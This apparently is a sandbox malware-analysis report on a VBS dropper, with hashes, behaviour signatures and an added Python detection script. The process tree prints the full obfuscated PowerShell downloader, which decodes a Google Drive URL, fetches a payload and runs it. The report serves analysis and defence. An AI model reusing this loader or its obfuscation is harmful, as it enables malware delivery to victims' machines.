Analysis
max time kernel: 94s
max time network: 95s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 08/06/2024, 07:18
Static task: static1
Behavioral task: behavioral1
  Sample: 83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs
  Resource: win7-20240508-en
Behavioral task: behavioral2
  Sample: 83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs
  Resource: win10v2004-20240426-en
General
Target: 83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs
Size: 23KB
MD5: 70e2991e57991e054e3473a4a9ec2a63
SHA1: 1fe4276566a2c6e7db0ab8b85cdc7b4de9cf86c1
SHA256: 83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d
SHA512: 4f32f979ca9da2bcca42d727f08215f8b652b17d0e98d9e31fe6f5414789731bf9805d8f74990af917ea8c2b0b4f0fa9124101759df17d4c601d90670f76300d
SSDEEP: 384:AcYk2uAnvIa7Yp000ekqThmLjp45PyUi6KkNXmNYXkfRf:Acx2p57qQqejpAPyUi6BNXxUft
Malware Config
Signatures

Blocklisted process makes network request (3 IoCs)
flow  pid   Process
3     2528  WScript.exe
9     4808  powershell.exe
16    4808  powershell.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
description        ioc                                                                                                  Process
Key value queried  \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation  WScript.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
flow  ioc
8     drive.google.com
9     drive.google.com

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (2 IoCs)
pid   Process
4808  powershell.exe
4808  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
description              pid   Process
Token: SeDebugPrivilege  4808  powershell.exe

Suspicious use of WriteProcessMemory (4 IoCs)
description                       pid   Process         procid_target
PID 2528 wrote to memory of 4808  2528  WScript.exe     84
PID 2528 wrote to memory of 4808  2528  WScript.exe     84
PID 4808 wrote to memory of 4776  4808  powershell.exe  87
PID 4808 wrote to memory of 4776  4808  powershell.exe  87
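The parent/child rows above (WScript.exe 2528 writing into powershell.exe 4808, which in turn spawns cmd.exe 4776) are the kind of relationship a process-creation detection can key on. The following is an added example, not part of this report and not the sandbox's own signature logic: three triage rules in Python run over process-creation events shaped like this report's process tree. The events are constructed for the example; the PIDs, image paths and the cmd.exe command line are taken from the report, while the parent PID of WScript.exe and the trimming of the PowerShell command line down to its decoder function are assumptions.

```python
"""Triage rules for a WScript -> PowerShell -> cmd chain like the one in this report."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# $obj.$var.Invoke(...) calls a method through a variable that holds its name; the
# sample uses it with the literal 'Substring' to hide a character-stride decoder.
METHOD_VIA_VARIABLE = re.compile(r"\.\$\w+\.Invoke\s*\(", re.IGNORECASE)

# cmd /c "echo %var%..." as a child of PowerShell: the sample resolves its drop
# path this way instead of reading the variable in-process.
ECHO_ENV_VIA_CMD = re.compile(r'/c\s+"?echo\s+%\w+%', re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(events: list) -> list:
    """Return (pid, rule) findings for the chains this report exhibits."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        parent_name = basename(parent.image) if parent else ""
        name = basename(e.image)
        if parent_name in SCRIPT_HOSTS and name == "powershell.exe":
            findings.append((e.pid, "script host spawned PowerShell"))
        if name == "powershell.exe" and "Substring" in e.cmdline \
                and METHOD_VIA_VARIABLE.search(e.cmdline):
            findings.append((e.pid, "PowerShell calls Substring through a "
                                    "variable-named method (stride decoder)"))
        if parent_name == "powershell.exe" and name == "cmd.exe" \
                and ECHO_ENV_VIA_CMD.search(e.cmdline):
            findings.append((e.pid, "PowerShell resolved an environment path "
                                    "via cmd /c echo"))
    return findings


# Constructed events mirroring the report's tree. PIDs, images and the cmd.exe
# command line are the page's; ppid 1 for WScript.exe is a placeholder, and the
# PowerShell command line is cut down to its decoder function (assumptions).
SAMPLE_EVENTS = [
    ProcEvent(2528, 1, r"C:\Windows\System32\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs"'),
    ProcEvent(4808, 2528, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "$Lgknoldet = 1;Function Berringsfladen190($Scratchcard){$Coil=$Scratchcard.Length-$Lgknoldet;"
              "$Kodfoderets='Substring';For( $gadebilledet=7;$gadebilledet -lt $Coil;$gadebilledet+=8)"
              "{$Underargue+=$Scratchcard.$Kodfoderets.Invoke( $gadebilledet, $Lgknoldet);}$Underargue;}"),
    ProcEvent(4776, 4808, r"C:\Windows\system32\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\kreditten.Non && echo t"'),
]


if __name__ == "__main__":
    for pid, rule in triage(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

The second rule is the most portable of the three: the script-host parent and the `cmd /c echo %var%` child will vary between droppers, but a PowerShell command line that invokes a method by a variable holding its name and carries the literal `Substring` is the builder's fingerprint regardless of which filler words it chose.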
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Lgknoldet = 1;Function Berringsfladen190($Scratchcard){$Coil=$Scratchcard.Length-$Lgknoldet;$Kodfoderets='Substring';For( $gadebilledet=7;$gadebilledet -lt $Coil;$gadebilledet+=8){$Underargue+=$Scratchcard.$Kodfoderets.Invoke( $gadebilledet, $Lgknoldet);}$Underargue;}function Forlyder($Climata11){ & ($Spatten) ($Climata11);}$benzimidazole=Berringsfladen190 'At,osfrMOsteopeoWheelabzIconveriAnnicaslSquiffilUndisciaSyninge/ Militr5Autobah.R.educa0Nonrege Untast.(ArbejdsWKonsti i UnderlnapiolindThermogoSvensknwPhototusKelpi,g TwofersNNudni.kTEntreat aianis1 Ari.rs0Aminotr. Heglin0Ostraci;Reguler FenolerWBestredi OpremsnBredspe6Kandi,a4Ba depl;Salater TilflyxDirecto6Profite4Hyperfo; Curumi Cam,hacrbrndborvPluri.o:Smit et1Uvaerd 2Undergr1Omlbets.Snitvrk0Phenoge)rgsjler KonsumpG bi.dsee EthanocIlluderk Embo,co Re.ren/Sarcorh2B,edsaa0 Lemmed1Osmousa0Karskca0Teknolo1.nitsel0Fagvide1Enbran, DelthedFtro,ekliM,crospr.iggyslechalanafLeukemio UdpegexM ckere/Klockma1Justtre2l,njefa1Renerne.Unmecha0Sa mens ';$Tirve=Berringsfladen190 'ImpoverUTandlgesMyelineeslickinrReempha- AngepiA BerusegOpinioneEksisten infinitEskimol ';$hawklike=Berringsfladen190 'PaneulohPrinzhot lar.ertDaavildp Si.onisSam.and:Pict.an/Lystopf/outw.rkdFastholrBrut.oiiGestikuvPhocenie Deir r.Huchof,gdissei,oUnbarspo.icondygHalvkuglKlvedese Firepl.Afnati.c IntranoPruditym,pasmol/T.letaduruf sitcSvmmela?Discrete ArchpaxClinoc pTr adreoPatri.trStemmeptF rulem=Asplenidneighboo,dscripw pill anGallardlatomythotautoloaProx,mod Beeroc&D,llerii ChoribdForbrnd=Ostraco1FyrmestRStaminaRSplurgigReprovip Echino_Centr,fRBrnelrdz Rvrdig2Enceph,yClothotpSuitlikiOculonaJforbrydcStreget0Kyphosi0 ,radusN Pi,udipOceanisuFuturisZ T,ille4goo nesPChaperot gyrome-MateriaiAabenbaw Stnned9WellermvMinimumjDeserteKSektion2 Nonmet7Ganglio2grundta ';$Galliwasp=Berringsfladen190 ' Cumbro>Noncura ';$Spatten=Berringsfladen190 
'cylindeiAntisipespionsax Lkkers ';$Cestos='Plsebar';$Uncastle = Berringsfladen190 'Skrukh.eVarebetc BoremahResorbeoRebuoya Dobbel%GuldaldaRebunchpUnglac pInstrumd Dent,iaNonsenst Slavd,a .akers% Uncarn\rovsingkKassea r Phyl.oe DammusdT larigiUnraptutCurvulatDonkeyke F somhnInterd,.LeatherN estlndoFunnellnudstykn Tanksta&indenri&populat Sk,vrigeFixearbcUnaturehDespotioRedisti SiegeabtHyleton ';Forlyder (Berringsfladen190 'Minxshi$kazaktagperspe l Yi,esao ellw nbMentoriaMaintailweather:GetatabBGrat,iteFalsknekAl,rinslSt,diecaResign gSluknineForeloulJoniseriJant.rsg HandedeFolkedor Ringvee comedis Angleb=Lsepult(Codesigc Forligm asturtdW.ndfla Coilyea/Wal,mancMilieur unmole$AndensiUOverfornStn,etsc GratisaForv klsArteriotDiphtholSeriocoeVampyr )Imm nas ');Forlyder (Berringsfladen190 'Ekst.at$t,kstmag BalloolTahinamoVan,alibAlgeaspaSusendel Bortad:,iatomeBgaspistuFun.ametValfar.y OutgoilMilitrnaEl.ktrimLiljekoi,ignalbnForbruseDisprop=gy,ospo$VelopdrhefterkraSeksogtwDirekt.kYaqo,aslKradsemiOrd einkSeptleveAscidio.Maaltids UnriskpCoveraglHusstaniEnergimtV,dired(Vlverhu$SprngkrGclo steaArno.islMurmurelGalosheiE fektiwSyskedaa SentimsBancosrpWeelvir)Hemolym ');$hawklike=$Butylamine[0];$Icterine= (Berringsfladen190 'Lysesta$ Unp,esgMisapprlLygtem,oCliquisb ParqueaSuppegrlWooersv:F.rbldtBti,guytrStreli nPallidieSpo,tedsReturneaUndisseaLiv,lanrBortled=Lich opN Celeb,eKalve,rw E,char-Pa,asubOHoverenbHerbagej.ilburseNonpondc U urdet Regara CeilingSCalibrayBreechlsLutianitMancheseCertifimOvulist.Homoc.nNS ldiereO.cultitRa,atou.D.ppelkWHeltindeOutpoisbTruistiCPa,tsuil R,bbiniDyr.naveAk,iespnSelektit');$Icterine+=$Beklageligeres[1];Forlyder ($Icterine);Forlyder (Berringsfladen190 ' Sundhe$ Besku BKampk,ar DopplenPoncedneSjlelivs Khahooa,orestia RigborrUnf.rio.WortworH Fritage MonograDemiss.dkonsumeeHelbredr deconcsDru.maa[Rodkno.$TeleskoTSpk.uggi Unn tirArtillevCoronateCurs,re] Rea,ti=Reperso$AsketerbMiljpaaeBeboelsnbamboozzHal.geniyerkednmPsammopiIndividd commena 
Lemlstz.ackeysoKildeskl ynenefe Opslmm ');$Vicontiels=Berringsfladen190 ' Cult v$PaginerB Eve,tyrUr,nomenAfgangseRibningsMu icataBesgactaCognat rGenicul.PorphyrDBilandeoargumenwMac.otonEfterralTollek osmlehovaOvervind OversiFTv vlraiTeledenlLeikafoeBitterb(titulad$Data.ash NuleneaEscandawKphjestkLeukstrl Daughti Ug.kork arbuckeRegnska,Galgenf$ AfdampP Uhllost ashpeeeRiddamprAepost oseismomsBrandfapIndsk.ieLedelinr Ejend.mTrffedeo aestrouGalmandswurleyp)Unfavou ';$Pterospermous=$Beklageligeres[0];Forlyder (Berringsfladen190 ' Flyv,r$Plu,aligKompenslA elopro ThreepbGa.tritaKontoralBlommes: Heli.pOOpskrtekOneirosknotkerieFrihederGaneftrn,arkanteAttaindsSpkhugg1Velaryd9Spisefr8Skybru =Amatrni(AnretteTPlisseee MglingsWeirdybtTheoris-kemikalPDeplaneaWackymutSsonerchSrtilfl Noshers$DagtjenPTvivllstAlcaic,eElessarrhaandhvoUdsk.ftsAfstivepUnderekeOpinionrUanseelmcalycoioDelfiunu NidifisVirksom)Pal,ada ');while (!$Okkernes198) {Forlyder (Berringsfladen190 'Roseola$T.lkebigBkke,belOpslideoFa vetabH lverea Trfsikl Becree: rigsrVTakkeklvExtillveTweedjar oliedriStk.ingsFidd eb=Slutdis$PrognostimmoralrFaint su Dis,oneAnissma ') ;Forlyder $Vicontiels;Forlyder (Berringsfladen190 ' Chond.SRet eadtAmm.nitaNondemarMaa,edstSteekin-MarmoreSnetstrmlR,jsebeeTelephoeUnpeacepStr,gsr Bryllup4fire,ar ');Forlyder (Berringsfladen190 'Fo.efal$SporinggMouthp lDdedansoNoexfrdb oughesa nstabil Dephlo: FormueO.panagekEpiz,oakHeweunpe agustircapitulnNonferoeVindikas Karrie1 cciput9Aa.esky8elletre=Adulter(Afsy inTRevivale Ciconis otaltetBumleno-DemagniPPleurocaCorriget.aandudhFrstesa ,linkfy$BrneforPBecommatPlatteneHungerlrSalgssto BortsasFoliernpSindelae ContemrPreheatmZollsuboDicho,duKod ficsproblem)Mink.ar ') ;Forlyder (Berringsfladen190 'Oliefar$Konc rngAnaly.el GlyoxyoRaf.inebDisq,isaZoransbl Arguit:KulturmPOrthoceuVerden,sWigletstEdsformeCaloricrKolonneuDe.elecm FortepmVemo.sse,nlagemnCha,emoe Dimiss=Phellog$NotochogSocketll,ndespooVammelhbBrakvanaByggemylStoette:Kolokv.eEjendomxNonulcecPebbleha 
undervvRaakremaCrookintSre ebaeDeskr,ps Unfatt+Avenuer+Steffis% Sku.ri$Joypop.BChokolauM.tvasktPriorizyLigaturlMagnascaEarscremStratociFrimeninS.hverteTwe vem.WanglincTruttacoweaseleu.udipednSe,vanttKa.eand ') ;$hawklike=$Butylamine[$Pusterummene];}$unentrapped=293328;$Zooplasty177=30076;Forlyder (Berringsfladen190 'Espe,an$ SelskagSt.gsejlTacheomoSemiquibActuariarecrushl fisker:RelishiAKompromgSemostogCircumfrG,noesee Ensilag,yppelsaB holdntMultisoeKejserptUdkaarisEt.onom Mor,inb=Outbrag TindingGGlycopeeLvs.ovetassurer-EineborC Mol,bdoOptrkkenunl.beltPyrenoieGrskepen Gyrinit F lker Uncolor$ Gluep PFo.dumstEgalitee EmissirScaremoodesertes UnderdpbeadroleComputeropercu mFugtigkoSjllanduColyticsPa idae ');Forlyder (Berringsfladen190 'Enaptse$CurranagPonyerslSlutbetoShoddywbCapsuliaNervulolGospel.: Bur.auR Dysleke O alizlHomotraeSaltiesgGymnasieAshramsrEidologi TuparanFotocelg Sorthae E.odfirScutchen Keelmae RenummsAngrebs Roekamp= Syg.jo Ahoycri[SuperesSUdtagetyLanier,sResprintAirbruseNavle,em Spor.e.Propo,tCEnamou oKonkurrnNeo.acivGladsakeSv,dekurUskoksntproinve]Refinis:Trowser:TaenkteFSerb rarEk pedeoNonellimMiswaytBSa menbaEntredesUnintereSaunder6Aminosy4 ReeshiSCarcinotdukkevorDiptycaiZind.senHelautogStrenge(Grovvar$ MethodAkassablgJackersg EventurShockineAnimistgTrini raBehov.ntPrereveeSlagt,ft LollypsBillige) Predic ');Forlyder (Berringsfladen190 ' Pa til$Dy frosgDesorbel RechaloFortrngbL idensaslavehal,astril:MutismpPSamhrigr ReciviaAfholdei holines C relleBeedigerInd,ere Forhold=Superw pehohom[.earlssSDeci.esybsseninsDiscerpt ybstegeModstanmE.ratum.RestrikT InexoreH,lgenex Sc,phatSpouseh. 
sningeEBnd llanLejdesacO,erridoFamlesfdDicingoi Thiochn GigologDunamsd] Sp,nta:Stor.ed:KorrigaAFa veglSMill onCRkkeflgI ,ricotIFl essa.ChromomG .ipskgeSorglstt PseudoSBal.egntDmning.rThistediGi.bettnKonsummgrekapit(Trumfst$HudsoniRToys,meeCheesemlRetorsie TransmgKunstmaeBlegso rMetazoai DublednAdvocatgPudderne KnackerFlerdobnWiener,eNiaisgusNo,syll) Bitsto ');Forlyder (Berringsfladen190 'Searcha$Teori.ngrattrailMavercao Unmustb StorfaaSonicatl Decolo: LancerACa,pfirsIltningk Stabile ImpenetSlalomeeUnoilgrn.apperl=un rook$DansetrPFlabederstabelvaRodeoeni ,rydefsretfrd eTaranchrDrif.sp.TopkicksAdhib.tuBe,ryprbGenindssAffronttPiperylrSort.meiindissonLagringgApathi,(No.comp$ThessaluMonostenVeerufyeLaasesmnBescurft Loathsr,uldbryaOperaerpdiskenspVenialieBocher.dTatt dd,Stillin$ReappliZGevreruoslutt dodefencepuretms.l.onsellaMenufilsCataclytTote.ply.erolig1Spidsmu7Mrkelig7Bouillo)Que.ule ');Forlyder $Asketen;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4808 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\kreditten.Non && echo t"3⤵PID:4776
-
-
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize  8KB
MD5       b98730add3fdac807aa8a524679c31c7
SHA1      0027f4bf52d43ea2aaee06a78c4dca190799e5f9
SHA256    8a6d3e18638460134e0ca1020b5d2ed00246327d28516b7181423e6a16ebeeed
SHA512    546bc8b8b3dd9d6f5a870794ad38b30ff0e052be9d00b3e5d6e35a8ca417970b86456e39d1bc6a5fb652b4d9b5765d3b47fc43033a0a151db9791df64b0b92d3

Filesize  494B
MD5       290fae52f17dbaeec503dfb5d085abff
SHA1      fdae242a21f6383d0d5aab98f1bf1f3768d833b6
SHA256    d2390d6c0c3ba3ae1422d582888dcadcb05c387567e3000eb148da64aeb364e9
SHA512    7f6d352a85b7fb6c5f5d5d2d76bd081a525ff941b28f481d166a054dbbdcbe0aa4640ea6eb31b226d59f94a4cd5a549df9f041880e481ff397294a048a7a280b

Filesize  3KB
MD5       e3c54d10d7b28f4437e5082454a22cb7
SHA1      f5d6c9ff3d8bebf64c7a03416e005aea2f72f82e
SHA256    4641feef049099ee8406644631ffb5a83d07c631c29f15490824d649c52c868b
SHA512    f26f744f344c692551d23f0d8281f27bd2bd6de2263b89c1642f3196ac90c28337019e5d47e9b88cf2e607b5a3e70f3c30f9ee94fb9fae43b4f3a351cd309fc6

Filesize  60B
MD5       d17fe0a3f47be24a6453e9ef58c94641
SHA1      6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82